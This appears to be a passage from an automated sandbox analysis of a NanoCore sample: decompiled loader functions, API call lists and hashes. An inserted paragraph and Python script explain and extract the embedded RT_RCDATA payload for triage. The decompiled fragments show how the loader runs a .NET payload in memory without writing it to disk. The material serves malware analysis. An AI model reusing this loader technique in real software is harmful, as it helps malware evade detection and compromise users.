            				}
            			}

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

            C-Code - Quality: 100%
            			E004025BA() {
            				void* _t4;
            				void* _t8;
            
            				E00402AE5();
            				E00402A79();
            				if(E004027D9() != 0) {
            					_t4 = E0040278B(_t8, __eflags);
            					__eflags = _t4;
            					if(_t4 != 0) {
            						return 1;
            					} else {
            						E00402815();
            						goto L1;
            					}
            				} else {
            					L1:
            					return 0;
            				}
            			}

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

            C-Code - Quality: 87%
            			E00402E79(intOrPtr _a4) {
            				signed int _v8;
            				void* _v12;
            				char _v16;
            				intOrPtr* _t35;
            				struct HINSTANCE__* _t36;
            				struct HINSTANCE__* _t42;
            				intOrPtr* _t43;
            				intOrPtr* _t44;
            				WCHAR* _t48;
            				struct HINSTANCE__* _t49;
            				struct HINSTANCE__* _t53;
            				intOrPtr* _t56;
            				struct HINSTANCE__* _t61;
            				intOrPtr _t62;
            
            				if(_a4 == 2 || _a4 == 1) {
            					GetModuleFileNameW(0, 0x412bf8, 0x104);
            					_t48 =  *0x412e7c; // 0x641bfc
            					 *0x412e80 = 0x412bf8;
            					if(_t48 == 0 ||  *_t48 == 0) {
            						_t48 = 0x412bf8;
            					}
            					_v8 = 0;
            					_v16 = 0;
            					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
            					_t61 = E0040311E(_v8, _v16, 2);
            					if(_t61 != 0) {
            						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
            						if(_a4 != 1) {
            							_v12 = 0;
            							_push( &_v12);
            							_t49 = E00404D5E(_t61);
            							if(_t49 == 0) {
            								_t56 = _v12;
            								_t53 = 0;
            								_t35 = _t56;
            								if( *_t56 == 0) {
            									L15:
            									_t36 = 0;
            									 *0x412e6c = _t53;
            									_v12 = 0;
            									_t49 = 0;
            									 *0x412e74 = _t56;
            									L16:
            									E00403E03(_t36);
            									_v12 = 0;
            									goto L17;
            								} else {
            									goto L14;
            								}
            								do {
            									L14:
            									_t35 = _t35 + 4;
            									_t53 =  &(_t53->i);
            								} while ( *_t35 != 0);
            								goto L15;
            							}
            							_t36 = _v12;
            							goto L16;
            						}
            						 *0x412e6c = _v8 - 1;
            						_t42 = _t61;
            						_t61 = 0;
            						 *0x412e74 = _t42;
            						goto L10;
            					} else {
            						_t43 = E00404831();
            						_push(0xc);
            						_pop(0);
            						 *_t43 = 0;
            						L10:
            						_t49 = 0;
            						L17:
            						E00403E03(_t61);
            						return _t49;
            					}
            				} else {
            					_t44 = E00404831();
            					_t62 = 0x16;
            					 *_t44 = _t62;
            					E00404639();
            					return _t62;
            				}
            			}

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\nanocore.exe,00000104), ref: 00402EB4
            Memory Dump Source
            • Source File: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Users\user\Desktop\nanocore.exe$h?d
            • API String ID: 514040917-1397954633
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98

            Executed Functions

            C-Code - Quality: 100%
            			E00401E1D() {
            				_Unknown_base(*)()* _t1;
            
            				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
            				return _t1;
            			}

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88

            C-Code - Quality: 100%
            			E00401489() {
            				void* _v8;
            				struct HRSRC__* _t4;
            				long _t10;
            				struct HRSRC__* _t12;
            				void* _t16;
            
            				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
            				_t12 = _t4;
            				if(_t12 == 0) {
            					L6:
            					ExitProcess(0);
            				}
            				_t16 = LoadResource(GetModuleHandleW(0), _t12);
            				if(_t16 != 0) {
            					_v8 = LockResource(_t16);
            					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
            					_t13 = _v8;
            					if(_v8 != 0 && _t10 != 0) {
            						L00401000(_t13, _t10); // executed
            					}
            				}
            				FreeResource(_t16);
            				goto L6;
            			}

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
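
            E00401489 above is the whole job of the native wrapper: FindResourceW(GetModuleHandleW(0), 1, 0xa) looks up resource ID 1 of type RT_RCDATA (10) in its own image, LockResource and SizeofResource give the pointer and length, and L00401000 (whose subcall note shows CLRCreateInstance from MSCOREE together with the string v4.0.30319) hosts the .NET 4 runtime in-process to run that blob, so the managed payload never has to be written to disk; ExitProcess(0) follows whether or not the lookup succeeded. The Python script below is an added example written for this report, not code from the sample or from the sandbox: it walks a PE's resource directory without third-party modules, pulls out the same RT_RCDATA/1 entry (first language entry, which is what an unqualified FindResourceW resolves to on a single-language resource tree), and checks whether the result is itself a PE with a populated CLR header (data directory 14), the first triage step for a loader of this shape. The build_test_pe fixture and the nested test image are constructed for the example and carry no bytes from nanocore.exe.

```python
import struct

RT_RCDATA = 10                              # resource type E00401489 passes to FindResourceW
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # CLR header; populated only in .NET images


def _parse_pe(data):
    """Return (data_directories, [(vaddr, size, raw_ptr)]) from a PE32/PE32+ file image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    dd_off = 96 if struct.unpack_from("<H", data, opt)[0] == 0x10B else 112  # PE32 / PE32+
    n_dirs = struct.unpack_from("<I", data, opt + dd_off - 4)[0]
    dirs = [struct.unpack_from("<II", data, opt + dd_off + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsec):
        vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", data, opt + opt_size + 40 * i + 8)
        sections.append((vaddr, max(vsize, raw_size), raw_ptr))
    return dirs, sections


def _rva_to_offset(sections, rva):
    for vaddr, size, raw_ptr in sections:
        if vaddr <= rva < vaddr + size:
            return rva - vaddr + raw_ptr
    raise ValueError("RVA %#x is not backed by any section" % rva)


def _dir_entries(data, base, dir_off):
    """Entries of one IMAGE_RESOURCE_DIRECTORY as (id, offset, is_subdirectory)."""
    n_named, n_id = struct.unpack_from("<HH", data, base + dir_off + 12)
    entries = []
    for i in range(n_named + n_id):
        ident, off = struct.unpack_from("<II", data, base + dir_off + 16 + 8 * i)
        entries.append((ident, off & 0x7FFFFFFF, bool(off & 0x80000000)))
    return entries


def extract_resource(data, res_type, res_id):
    """Bytes of resource res_type/res_id (first language entry), or None if absent."""
    dirs, sections = _parse_pe(data)
    if len(dirs) <= IMAGE_DIRECTORY_ENTRY_RESOURCE or dirs[IMAGE_DIRECTORY_ENTRY_RESOURCE][0] == 0:
        return None
    base = _rva_to_offset(sections, dirs[IMAGE_DIRECTORY_ENTRY_RESOURCE][0])
    for t_id, t_off, t_sub in _dir_entries(data, base, 0):              # level 1: type
        if t_id != res_type or not t_sub:
            continue
        for n_id, n_off, n_sub in _dir_entries(data, base, t_off):      # level 2: name/ID
            if n_id != res_id or not n_sub:
                continue
            for _lang, l_off, l_sub in _dir_entries(data, base, n_off):  # level 3: language
                if l_sub:
                    continue
                data_rva, size = struct.unpack_from("<II", data, base + l_off)  # IMAGE_RESOURCE_DATA_ENTRY
                start = _rva_to_offset(sections, data_rva)
                return data[start:start + size]
    return None


def has_clr_header(blob):
    """True if blob is a PE whose COM descriptor directory (the CLR header) is set."""
    try:
        dirs, _ = _parse_pe(blob)
    except (ValueError, struct.error):
        return False
    return (len(dirs) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            and dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR][0] != 0)


def build_test_pe(payload=b"", clr=False):
    """Constructed fixture (no sample data): minimal PE32 with a .rsrc holding RT_RCDATA/1/0x409."""
    rsrc_rva, raw_ptr = 0x2000, 0x200

    def rdir(entry_id, off, subdir):                # one-entry IMAGE_RESOURCE_DIRECTORY
        return struct.pack("<IIHHHHII", 0, 0, 0, 0, 0, 1, entry_id, off | (0x80000000 if subdir else 0))
    rsrc = rdir(RT_RCDATA, 0x18, True) + rdir(1, 0x30, True) + rdir(0x409, 0x48, False)
    rsrc += struct.pack("<IIII", rsrc_rva + 0x58, len(payload), 0, 0) + payload
    dos = bytearray(b"MZ".ljust(64, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                        # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, rsrc_rva, len(rsrc))
    if clr:                                                    # mark the fixture as a .NET image
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x3000, 0x48)
    sec = struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc), rsrc_rva, len(rsrc), raw_ptr, 0, 0, 0, 0, 0x40000040)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec
    return header.ljust(raw_ptr, b"\0") + rsrc


if __name__ == "__main__":
    blob = extract_resource(build_test_pe(build_test_pe(clr=True)), RT_RCDATA, 1)
    print("RT_RCDATA/1: %d bytes, CLR header: %s" % (len(blob), has_clr_header(blob)))
```

            Against the real file the call is extract_resource(open(path, "rb").read(), RT_RCDATA, 1) followed by has_clr_header() on the result. If that check comes back false for a loader that still ends up in CLRCreateInstance, the blob is transformed before it reaches the runtime and L00401000 is the place to look for what it does with the bytes first.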

            APIs
            • GetCurrentProcess.KERNEL32 ref: 0215B730
            • GetCurrentThread.KERNEL32 ref: 0215B76D
            • GetCurrentProcess.KERNEL32 ref: 0215B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0215B803
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: e692ae0bdd4c986b8d3d91af3cb76973929f25aaf43c5b0784bbcf7043a53ff8
            • Instruction ID: 268ae1fd51ac6fb481eecadff834ebfa7b4accda431cd75bad4b1195fb5669cc
            • Opcode Fuzzy Hash: e692ae0bdd4c986b8d3d91af3cb76973929f25aaf43c5b0784bbcf7043a53ff8
            • Instruction Fuzzy Hash: E65158B49053488FDB10CFA9D588BDEBBF1EF48318F1484A9E419A72A0D7746944CB65

            APIs
            • GetCurrentProcess.KERNEL32 ref: 0215B730
            • GetCurrentThread.KERNEL32 ref: 0215B76D
            • GetCurrentProcess.KERNEL32 ref: 0215B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0215B803
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 60eb2be3389e019c1bbada2e574530e77003bb3edacb3adb96157516c689a18f
            • Instruction ID: e66bdf36a017f0b97dfd9bc589a3c15a49100e695fa63c66fbbc0c8daa22e3fc
            • Opcode Fuzzy Hash: 60eb2be3389e019c1bbada2e574530e77003bb3edacb3adb96157516c689a18f
            • Instruction Fuzzy Hash: C85136B0A04348CFDB10CFA9D548BDEBBF1FB48318F248469E419B7260D7746944CB65

            C-Code - Quality: 100%
            			E004055C5(void* __ecx) {
            				void* _t6;
            				void* _t14;
            				void* _t18;
            				WCHAR* _t19;
            
            				_t14 = __ecx;
            				_t19 = GetEnvironmentStringsW();
            				if(_t19 != 0) {
            					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
            					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
            					_t18 = _t6;
            					if(_t18 != 0) {
            						E0040ACF0(_t18, _t19, _t12);
            					}
            					E00403E03(0);
            					FreeEnvironmentStringsW(_t19);
            				} else {
            					_t18 = 0;
            				}
            				return _t18;
            			}

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1b7b9decf5631bcf28bd0315f6d699c35d4eab6da54c52496c50b6fb0b944eec
            • Instruction ID: 87ee76c02079b211f0cb800e08a5717058ec6f2d526295c2a58012ef4407392c
            • Opcode Fuzzy Hash: 1b7b9decf5631bcf28bd0315f6d699c35d4eab6da54c52496c50b6fb0b944eec
            • Instruction Fuzzy Hash: 9E226378E04206CFDB54EB94F588EBEBBB2FF89310F248555D49267365C734A882CB61
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0215962E
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: fcc90d91e72559cc55da3a6bd551f39ad9957d062dfd56ba16c7407f523eaae6
            • Instruction ID: 6e015c61b2c5c2c4968b1b3d560444d5a3ec0583fc345e539dd3bb48ac74da21
            • Opcode Fuzzy Hash: fcc90d91e72559cc55da3a6bd551f39ad9957d062dfd56ba16c7407f523eaae6
            • Instruction Fuzzy Hash: 5E712570A00B15CFDB24DF29D15175ABBF2BF88204F008A6ED89AD7A50D774E846CF92
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050846B1
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: b13df8f0a8802c3e6c459f012b30748ab6dc294a24cf62eb81cd7cb08c88cd9a
            • Instruction ID: ae7e5f297434b1443b6b87efe8a2c50378fbdff51bb7dac35bfe25f3a0cf50f7
            • Opcode Fuzzy Hash: b13df8f0a8802c3e6c459f012b30748ab6dc294a24cf62eb81cd7cb08c88cd9a
            • Instruction Fuzzy Hash: B55123B1C04659CFDB20DFA9D884BDEBBF1BF48308F20806AD448AB251D7B56946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0215FD0A
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 1b294f62969a8117897895bbb4678bf4050c211e0952917e1d93c5aa8db1b802
            • Instruction ID: ab4974fc6035ac69c6dd8f533eeba7f1c771d53bf43885bd210ad5200ea2a609
            • Opcode Fuzzy Hash: 1b294f62969a8117897895bbb4678bf4050c211e0952917e1d93c5aa8db1b802
            • Instruction Fuzzy Hash: E351B0B1D00219DFDB14CFA9D884ADEBBB5FF88314F24852AE819AB210D7759946CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0215FD0A
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 9143125105969d768f4a031b2c70604923ecd22c3ec2b99859a5a3015be92ac5
            • Instruction ID: d12a3da2dcaeef4a9119689191024ce2497358a1eb7510eae6e5f13b07abcc3b
            • Opcode Fuzzy Hash: 9143125105969d768f4a031b2c70604923ecd22c3ec2b99859a5a3015be92ac5
            • Instruction Fuzzy Hash: 6341B0B1D00319DFDF14CFA9D884ADEBBB5BF88314F24852AE819AB210D7759945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 050846B1
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 9783a47ab3c9cf694ebff79ed2af6aedee881ff0fab8855a263a92373d562ffa
            • Instruction ID: 6d8b7f2f86a20e7b3249821a7e5df0aea4e0b36c41f4dc0088b660fbd9fb6c75
            • Opcode Fuzzy Hash: 9783a47ab3c9cf694ebff79ed2af6aedee881ff0fab8855a263a92373d562ffa
            • Instruction Fuzzy Hash: A84123B0C04659CBDB20DFA9D944BDDBBF1BF88308F20806AD448AB251D7B56945CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05082531
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: d1aebae3609c05b2089794cd0a067d8e74bc47af4a067c36c4003580da13df47
            • Instruction ID: f887e8ba46be1a8b9372cd027f4291107b537462a391c866486c41d273f15dfe
            • Opcode Fuzzy Hash: d1aebae3609c05b2089794cd0a067d8e74bc47af4a067c36c4003580da13df47
            • Instruction Fuzzy Hash: 004118B8A003058FDB14DF99D448FAEBBF6FB88314F148459D559AB321D774A845CFA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0508B957
            Memory Dump Source
            • Source File: 0000000B.00000002.688412958.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: 1779325d57d53cdd955a2fd209b60713fc2f059295aa0c45fceaaf0b75313ccf
            • Instruction ID: f2b2a49740b4069ba12eece25963db956ceea5825df5b35cea0404ec2611f754
            • Opcode Fuzzy Hash: 1779325d57d53cdd955a2fd209b60713fc2f059295aa0c45fceaaf0b75313ccf
            • Instruction Fuzzy Hash: 23318D72904348AFDB119FA9D844BEEBFF8EF19314F08806AE594A7261C335D854DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindCloseChangeNotification.KERNELBASE(?), ref: 05256320
            Memory Dump Source
            • Source File: 0000000B.00000002.688683609.0000000005250000.00000040.00000001.sdmp, Offset: 05250000, based on PE: false
            Similarity
            • API ID: ChangeCloseFindNotification
            • String ID:
            • API String ID: 2591292051-0
            • Opcode ID: a61d4d8776b274011c9e2e0e78b566bc3ad364299a6ac8d7ce620d793b00bbd3
            • Instruction ID: df6e1071ef973fe54228b5fd1b6df07f153fb0e8b3952df57b889e13d4764199
            • Opcode Fuzzy Hash: a61d4d8776b274011c9e2e0e78b566bc3ad364299a6ac8d7ce620d793b00bbd3
            • Instruction Fuzzy Hash: DD218871914308DFCB10DF99D448B9EBBF4FF58320F54806AE958AB251C735A944CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0215BD87
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: dc75c79c176ebe7c0e00e887280c79244bdf511c88b501f888884a55ecca3b11
            • Instruction ID: ec73c391b8e79a1576bf7b8eee789b759c703c9da160555e825a38f305d005cf
            • Opcode Fuzzy Hash: dc75c79c176ebe7c0e00e887280c79244bdf511c88b501f888884a55ecca3b11
            • Instruction Fuzzy Hash: F321F2B5904218AFDB10CFA9D484BDEBBF4EB48314F14801AE918A7250C379A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0215BD87
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 1e245e5b13363d160bfc93387cd8807a61411ff5735d0d21fdc9f7f5214743d5
            • Instruction ID: bd2045915806f956c65e5c46dd9eaed401a6e9a0e8ada6859b7406496d41ea98
            • Opcode Fuzzy Hash: 1e245e5b13363d160bfc93387cd8807a61411ff5735d0d21fdc9f7f5214743d5
            • Instruction Fuzzy Hash: B521E3B5904208DFDB10CFA9D484BDEBBF8EB48314F14841AE918A3210C379A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 02157F5D
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: 844b5c0aa8d25f9f6db6779ca938139fdb61046eea73b7257216abe0e80e0d87
            • Instruction ID: 1efed207d31ec2515d342d4fc734b407136ecfd1718277d62fcbfad1c7d9658d
            • Opcode Fuzzy Hash: 844b5c0aa8d25f9f6db6779ca938139fdb61046eea73b7257216abe0e80e0d87
            • Instruction Fuzzy Hash: A521E771944398DFDB11CF98D4453DEFFF4EB05314F44446AE494A7282C3389616CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,021596A9,00000800,00000000,00000000), ref: 021598BA
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: e2034f7cb0564909f40bcca1c5f8eba3d4391c99cf27c3c27261e6a9db31c3cf
            • Instruction ID: 36faf671d943b2e876209813dd78dd8f15d33fa2c100b39b713844cfc56d4bd3
            • Opcode Fuzzy Hash: e2034f7cb0564909f40bcca1c5f8eba3d4391c99cf27c3c27261e6a9db31c3cf
            • Instruction Fuzzy Hash: 1311F2B5904209DBDB10CF9AD444BDEFBF4AB88314F14846AE929B7600C379A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,021596A9,00000800,00000000,00000000), ref: 021598BA
            Memory Dump Source
            • Source File: 0000000B.00000002.684406834.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 6e21a9f164f5c29561e8cb3a6f1beb92e7b4bf7a2206bee05db7f6298389791a
            • Instruction ID: cf9ecdf08743f72f2141e5359b7a3f097fc5b9755d20d26fc13b7c35705ef8cd
            • Opcode Fuzzy Hash: 6e21a9f164f5c29561e8cb3a6f1beb92e7b4bf7a2206bee05db7f6298389791a
            • Instruction Fuzzy Hash: B11114B6D04209CFDB10CF99D444BDEFBF5AB88314F14852AE829A7600C379A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0508B957
            Memory Dump Source
